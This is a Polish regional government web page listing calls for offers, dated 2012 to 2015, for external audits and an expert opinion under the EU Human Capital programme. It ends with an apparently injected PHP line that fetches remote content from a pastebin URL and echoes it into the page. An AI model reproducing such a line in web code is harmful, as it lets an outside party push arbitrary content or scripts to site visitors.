Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

AUDYT ZEWNĘTRZNY DZIAŁAŃ ZREALIZOWANYCH W RAMACH ROCZNEGO PLANU DZIAŁANIA POMOCY TECHNICZNEJ PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI NA LATA 2014 - 2015 (do 30.06.2015 r.)

W ramach procedury rozeznania rynku Urząd Marszałkowski Województwa Dolnośląskiego, Departament Funduszy Europejskich zaprasza do składania ofert na realizację zadania pn.:
wykonanie audytu zewnętrznego działań zrealizowanych w ramach Rocznego Planu Działania Pomocy technicznej Programu Operacyjnego Kapitał Ludzki na lata 2014 - 2015 (do 30.06.2015 r.)
zgodnie z załączonym Szczegółowym Opisem Przedmiotu Zamówienia
(załącznik nr 1) oraz wzorem umowy (załącznik nr 2).
Oferty należy przesyłać drogą elektroniczną na adres: damian.pichowicz@dolnyslask.pl w terminie do dnia 08 czerwca 2015 r. do godziny 13:00. Oferty złożone po wskazanym terminie nie będą podlegały ocenie.
1. W celu zapewnienia porównywalności wszystkich ofert, Zamawiający zastrzega sobie prawo do skontaktowania się z Wykonawcami w celu uzupełnienia lub doprecyzowania ofert.
2. Po wyborze Wykonawcy Zamawiający zastrzega sobie prawo negocjacji szczegółowych warunków realizacji zamówienia.
3. Zamawiający zastrzega sobie prawo do odpowiedzi tylko na wybraną ofertę.
4. Urząd Marszałkowski Województwa Dolnośląskiego zawiera umowy na podstawie własnych wzorów umów obowiązujących w Urzędzie.
5. Niniejsza oferta nie stanowi oferty w myśl art. 66 Kodeksu Cywilnego, jak również nie jest ogłoszeniem w rozumieniu ustawy Prawo zamówień publicznych.
6. Zamawiający zastrzega, że przedstawiona w ofercie całkowita cena realizacji zamówienia stanowi informację publiczną w rozumieniu Ustawy o dostępie do informacji publicznej.
W przypadku zastrzeżenia informacji przez wykonawcę jako tajemnicy przedsiębiorstwa lub tajemnicy przedsiębiorcy jego oferta podlega odrzuceniu.

Osobą uprawnioną do udzielania dodatkowych informacji jest:

Damian Pichowicz
tel.: 71 776 93 23
e-mail: damian.pichowicz@dolnyslask.pl

 

 Załącznik nr 1: Szczegółowy opis przedmiotu zamówienia

 Załącznik nr 2: Umowa

 Załącznik nr 3: Oświadczenie

13.06.2014

AUDYT ZEWNĘTRZNY DZIAŁAŃ ZREALIZOWANYCH W RAMACH ROCZNEGO PLANU DZIAŁANIA POMOCY TECHNICZNEJ PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI NA ROK 2013

W ramach procedury rozeznania rynku Urząd Marszałkowski Województwa Dolnośląskiego, Departament Funduszy Europejskich zaprasza do składania ofert na realizację zadania pn.:

wykonanie audytu zewnętrznego działań zrealizowanych w ramach Rocznego Planu Działania Pomocy technicznej Programu Operacyjnego Kapitał Ludzki na rok 2013

zgodnie z załączonym Szczegółowym Opisem Przedmiotu Zamówienia (załącznik nr 1) oraz wzorem umowy (załącznik nr 2)

Oferty należy przesyłać drogą elektroniczną na adres: sebastian.bojar@umwd.pl w terminie do dnia 23 czerwca 2014 r. do godziny 13:00. Oferty złożone po wskazanym terminie nie będą podlegały ocenie.

1. W celu zapewnienia porównywalności wszystkich ofert, Zamawiający zastrzega sobie prawo do skontaktowania się z Wykonawcami w celu uzupełnienia lub doprecyzowania ofert.

2. Po wyborze Wykonawcy Zamawiający zastrzega sobie prawo negocjacji szczegółowych warunków realizacji zamówienia.

3. Zamawiający zastrzega sobie prawo do odpowiedzi tylko na wybraną ofertę.

4. Urząd Marszałkowski Województwa Dolnośląskiego zawiera umowy na podstawie własnych wzorów umów obowiązujących w Urzędzie.

5. Niniejsza oferta nie stanowi oferty w myśl art. 66 Kodeksu Cywilnego, jak również nie jest ogłoszeniem w rozumieniu ustawy Prawo zamówień publicznych.

  1. Zamawiający zastrzega, że przedstawiona w ofercie całkowita cena realizacji zamówienia stanowi informację publiczną w rozumieniu Ustawy o dostępie do informacji publicznej. 
    W przypadku zastrzeżenia informacji przez wykonawcę jako tajemnicy przedsiębiorstwa lub tajemnicy przedsiębiorcy jego oferta podlega odrzuceniu.

Osobą uprawnioną do udzielania dodatkowych informacji jest:

Sebastian Bojar
tel.: 71 776 96 16
e-mail: sebastian.bojar@dolnyslask.pl

 

PLIKI DO POBRANIA:

1. Ogłoszenie

2. Załącznik Nr 1

3. Załącznik Nr 2

4. Załącznik Nr 3

Audyt zewnętrzny działań zrealizowanych w ramach rocznego Planu Działania Pomocy technicznej Programu Operacyjnego Kapitał Kudzki na rok 2012

W ramach procedury rozeznania rynku Urząd Marszałkowski Województwa Dolnośląskiego, Departament Funduszy Europejskich zaprasza do składania ofert na:
wykonanie audytu zewnętrznego działań zrealizowanych w ramach Rocznego Planu Działania Pomocy technicznej Programu Operacyjnego Kapitał Ludzki na rok 2012 - zgodnie
z załączonym Szczegółowym Opisem Przedmiotu Zamówienia (załącznik nr 1)

Oferty należy przesyłać drogą elektroniczną na adres: sebastian.bojar@umwd.pl w terminie do dnia 14 czerwca 2013 r. do godziny 10:00. Oferty złożone po wskazanym terminie nie będą podlegały ocenie.
1. W celu zapewnienia porównywalności wszystkich ofert, Zamawiający zastrzega sobie prawo do skontaktowania się z Wykonawcami w celu uzupełnienia lub doprecyzowania ofert.
2. Po wyborze Wykonawcy Zamawiający zastrzega sobie prawo negocjacji szczegółowych warunków zamówienia.
3. Zamawiający zastrzega sobie prawo do odpowiedzi tylko na wybraną ofertę.
4. Urząd Marszałkowski Województwa Dolnośląskiego zawiera umowy na podstawie własnych wzorów umów stosowanych w Urzędzie.
5. Niniejsza oferta nie stanowi oferty w myśl art. 66 Kodeksu Cywilnego, jak również nie jest ogłoszeniem w rozumieniu ustawy Prawo zamówień publicznych.
6. Zamawiający zastrzega, że przedstawiona w ofercie całkowita cena realizacji zamówienia stanowi informację publiczną w rozumieniu Ustawy o dostępie do informacji publicznej.
W przypadku zastrzeżenia informacji przez wykonawcę jako tajemnicy przedsiębiorstwa lub tajemnicy przedsiębiorcy jego oferta podlega odrzuceniu.
Osobą uprawnioną do udzielania dodatkowych informacji jest:

Sebastian Bojar
tel.: 71 776 96 16
e-mail: sebastian.bojar@dolnyslask.pl


 Dokument do pobrania (załącznik nr 1: Szczegółowy opis przedmiotu zamówienia)
 Dokument do pobrania (załącznik nr 2: Umowa)
 Dokument do pobrania (załącznik nr 3: Oświadczenie)

Opracowanie opinii eksperckiej dot. oszacowania wartości sporządzenia dokumentacji

W ramach procedury rozeznania rynku Urząd Marszałkowski Województwa Dolnośląskiego, Departament Europejskiego Funduszu Społecznego zaprasza do składania ofert na:
sporządzenie i wydanie opinii dot. oszacowania wartości opracowania dokumentacji
w Projekcie realizowanym w ramach Programu Operacyjnego Kapitał Ludzki - zgodnie
z załączonym Szczegółowym Opisem Przedmiotu Zamówienia (załącznik nr 1)
Oferty należy przesyłać drogą elektroniczną na adres: dorota.galantowicz@dolnyslask.pl w terminie do dnia 08 października 2012 r. do godziny 10:00. Oferty złożone po wskazanym terminie nie będą podlegały ocenie.
1. W celu zapewnienia porównywalności wszystkich ofert, Zamawiający zastrzega sobie prawo
do skontaktowania się z Wykonawcami w celu uzupełnienia lub doprecyzowania ofert.
2. Po wyborze Wykonawcy Zamawiający zastrzega sobie prawo negocjacji szczegółowych warunków zamówienia.
3. Zamawiający zastrzega sobie prawo do odpowiedzi tylko na wybraną ofertę.
4. Umowa na realizację zamówienia zostanie zawarta z wybranym Wykonawcą na wzorze umowy, stanowiącym załącznik nr 2.
5. Niniejsza oferta nie stanowi oferty w myśl art. 66 Kodeksu Cywilnego, jak również nie jest ogłoszeniem w rozumieniu ustawy Prawo zamówień publicznych.
6. Zamawiający zastrzega, że przedstawiona w ofercie całkowita cena realizacji zamówienia stanowi informację publiczną w rozumieniu Ustawy o dostępie do informacji publicznej.
W przypadku zastrzeżenia przez Wykonawcę informacji jako tajemnicy przedsiębiorstwa i/lub tajemnicy przedsiębiorcy - oferta podlega odrzuceniu.
7. Zamówienie będzie współfinansowane ze środków Europejskiego Funduszu Społecznego,
w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.

Osobą uprawnioną do udzielania dodatkowych informacji jest:


Dorota Galantowicz
Dział Wdrażania Priorytetu VIII
Wydział Wdrażania Programu Operacyjnego Kapitał Ludzki
Departament Europejskiego Funduszu Społecznego
ul. Mazowiecka 17, 50-541 Wrocław, pok. 2004
tel.: (71) 776 97 87
e-mail: dorota.galantowicz@dolnyslask.pl

 

 Dokument do pobrania (załącznik nr 1: Szczegółowy opis przedmiotu zamowienia)

 Dokument do pobrania ( załącznik nr 2: Umowa)

Audyt zewnętrzny działań zrealizowanych w ramach rocznego Planu Działania Pomocy technicznej Programu Operacyjnego Kapitał Ludzki na rok 2011

W ramach procedury rozeznania rynku Urząd Marszałkowski Województwa Dolnośląskiego, Departament Europejskiego Funduszu Społecznego zaprasza do składania ofert na:
wykonanie audytu zewnętrznego działań zrealizowanych w ramach Rocznego Planu Działania Pomocy technicznej Programu Operacyjnego Kapitał Ludzki na rok 2011 - zgodnie z załączonym Szczegółowym Opisem Przedmiotu Zamówienia (załącznik nr 1)
Oferty należy przesyłać drogą elektroniczną na adres: sebastian.bojar@umwd.pl w terminie do dnia 13 czerwca 2012 r. do godziny 11:00.

ZMIANA TERMINU SKŁADANIA OFERT - Oferty można przesyłać do dnia 18 czerwca 2012 do godziny 11:00

ZMIANA TERMINU SKŁADANIA OFERT - Oferty można przesyłać do dnia 20 czerwca 2012 do godziny 16:00

Oferty złożone po wskazanym terminie nie będą podlegały ocenie.
1. W celu zapewnienia porównywalności wszystkich ofert, Zamawiający zastrzega sobie prawo do skontaktowania się z Wykonawcami w celu uzupełnienia lub doprecyzowania ofert.
2. Po wyborze Wykonawcy Zamawiający zastrzega sobie prawo negocjacji szczegółowych warunków zamówienia.
3. Zamawiający zastrzega sobie prawo do odpowiedzi tylko na wybraną ofertę.
4. Urząd Marszałkowski Województwa Dolnośląskiego zawiera umowy na podstawie własnych wzorów umów stosowanych w Urzędzie.
5. Niniejsza oferta nie stanowi oferty w myśl art. 66 Kodeksu Cywilnego, jak również nie jest ogłoszeniem w rozumieniu ustawy Prawo zamówień publicznych.
6. Zamawiający zastrzega, że przedstawiona w ofercie całkowita cena realizacji zamówienia stanowi informację publiczną w rozumieniu Ustawy o dostępie do informacji publicznej.
W przypadku zastrzeżenia informacji przez wykonawcę jako tajemnicy przedsiębiorstwa lub tajemnicy przedsiębiorcy jego oferta podlega odrzuceniu.

Osobą uprawnioną do udzielania dodatkowych informacji jest:

Sebastian Bojar
tel.: 71 776 96 16
e-mail: sebastian.bojar@umwd.pl


 Dokument do pobrania (załącznik nr 1: Szczegółowy opis przedmiotu zamówienia)

 Dokument do pobrania (załącznik nr 2: Umowa)

 Dokument do pobrania (załącznik nr 3: Oświadczenie)

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");